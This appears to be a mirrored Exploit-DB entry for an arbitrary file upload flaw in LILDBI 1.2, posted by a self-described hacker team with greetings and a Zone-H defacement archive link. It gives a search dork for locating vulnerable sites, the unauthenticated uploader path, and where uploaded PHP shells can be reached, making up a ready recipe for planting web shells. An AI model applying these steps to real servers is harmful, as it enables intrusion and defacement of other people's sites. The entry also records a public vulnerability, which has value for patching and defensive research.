LILDBI – Arbitrary File Upload

Exploit Database
6 阅读

作者： EraGoN

日期： 2010-07-23
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14443/

# Exploit Title: LILDBI Shell Upload Vulnerability
# Date: 23.07.2010
# Author: EraGoN
# Software Link: http://productos.bvsalud.org/product.php?id=lildbi-web〈=en
# Version: 1.2
# Tested on: Ubuntu ( Linux ) - WinXP sp2/sp3

[Dark Hackers Team]

Dork : allinurl:"/lildbi/

POC :
The shell upload page : http://target.com/[path]/lildbi/e/admin/uploader.php

File Desination : http://target.com/[path]/lildbi/e/admin/files/[name].php 

Tyank you :)

Zone-H : 

http://zone-h.org/archive/notifier=Dark Hackers Team

**Proud to be Muslim
**Proud to be Albanian

[ Special Thanks For : Loock3D - XindiviD. - F3n1x1 - H4ckPr0.all albanian and kosovo hackers ^_^ ]
[ Greetz : Albanian-Legends.CoM - Exploit-DB.COM- inj3ct0r.com ]

last Exploits
LILDBI – Arbitrary File Upload的更多信息

Curriculum Evaluation System 1.0 – SQL Injection：
WordPress Theme Black-LetterHead 1.5 – ‘index.php’ Cross-Site Scripting：
UAEPD Shopping Script – ‘news.php?id’ SQL Injection：
@Mail 6.1.9 – ‘MailType’ Cross-Site Scripting：
Cgiemail 1.6 – Source Code Disclosure：
LimeSurvey < 3.16 - Remote Code Execution：
visinia 1.3 – Multiple Vulnerabilities：
Subrion CMS 4.0.5 – Cross-Site Request Forgery Bypass / Persistent Cross-Site Scripting：